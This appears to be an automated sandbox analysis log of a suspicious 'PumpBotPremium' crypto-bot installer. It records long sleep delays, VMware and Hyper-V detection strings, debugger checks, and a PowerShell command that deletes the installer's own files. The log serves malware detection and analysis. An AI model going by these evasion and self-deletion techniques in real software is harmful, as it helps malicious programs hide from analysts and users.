Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897578s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897468s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897352s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 6187 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899869s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899734s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep count: 1237 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899391s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899281s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899172s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -899062s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898953s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898844s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898734s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898625s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898516s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898391s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898266s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898156s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -898047s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -897937s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -897828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -897712s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352	Thread sleep time: -897609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep count: 4677 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899875s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 2538 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899656s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899547s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899437s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899328s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899218s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -899000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898781s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898672s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898562s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898343s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -898015s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400	Thread sleep time: -897906s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002347C0 FindFirstFileW,GetLastError,FindClose,	3_2_002347C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002416D0 FindFirstFileW,FindClose,FindClose,	3_2_002416D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00229E30 FindFirstFileW,CloseHandle,CreateFileW,SetFilePointer,ReadFile,CloseHandle,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose,	3_2_00229E30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0022BF60 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW,	3_2_0022BF60
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002940CD FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_002940CD
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002545C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	3_2_002545C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00254A00 FindFirstFileW,FindClose,	3_2_00254A00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0024CDF0 FindFirstFileW,FindClose,	3_2_0024CDF0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00211880 FindFirstFileW,FindNextFileW,FindClose,	3_2_00211880
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00231920 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,	3_2_00231920
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00235AD0 FindFirstFileW,FindClose,	3_2_00235AD0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00255E50 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	3_2_00255E50

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_002533F0 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

3_2_002533F0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00261680 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,

3_2_00261680

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899884	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899772	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899652	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899522	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899373	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899262	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899151	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897906

Source: aipackagechainer.exe, 00000003.00000002.1915356853.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+?
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2052852092.0000000007449000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmncVMware Screen Codec / VMware VideoInvalid packet
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Screen Codec / VMware Video
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0027D03D

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00238550 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

3_2_00238550

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,

3_2_00237530

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0027A0EE mov esi, dword ptr fs:[00000030h]	3_2_0027A0EE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0028A795 mov ecx, dword ptr fs:[00000030h]	3_2_0028A795
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0028F94C mov eax, dword ptr fs:[00000030h]	3_2_0028F94C
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0028F990 mov eax, dword ptr fs:[00000030h]	3_2_0028F990

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_0027A15A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

3_2_0027A15A

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0027C207 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0027C207
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0021C700 __set_se_translator,SetUnhandledExceptionFilter,	3_2_0021C700
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0027D03D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0027D1D0 SetUnhandledExceptionFilter,	3_2_0027D1D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00281363 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00281363

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_002591C0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,

3_2_002591C0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_d021.ps1 -paths 'c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium','c:\users\user\appdata\roaming\coinsw.app' -retry_count 10"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_d021.ps1 -paths 'c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium','c:\users\user\appdata\roaming\coinsw.app' -retry_count 10"			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_002323D0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,

3_2_002323D0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_0027CCD0 cpuid

3_2_0027CCD0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	3_2_002965BB
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: GetLocaleInfoW,	3_2_002967B6
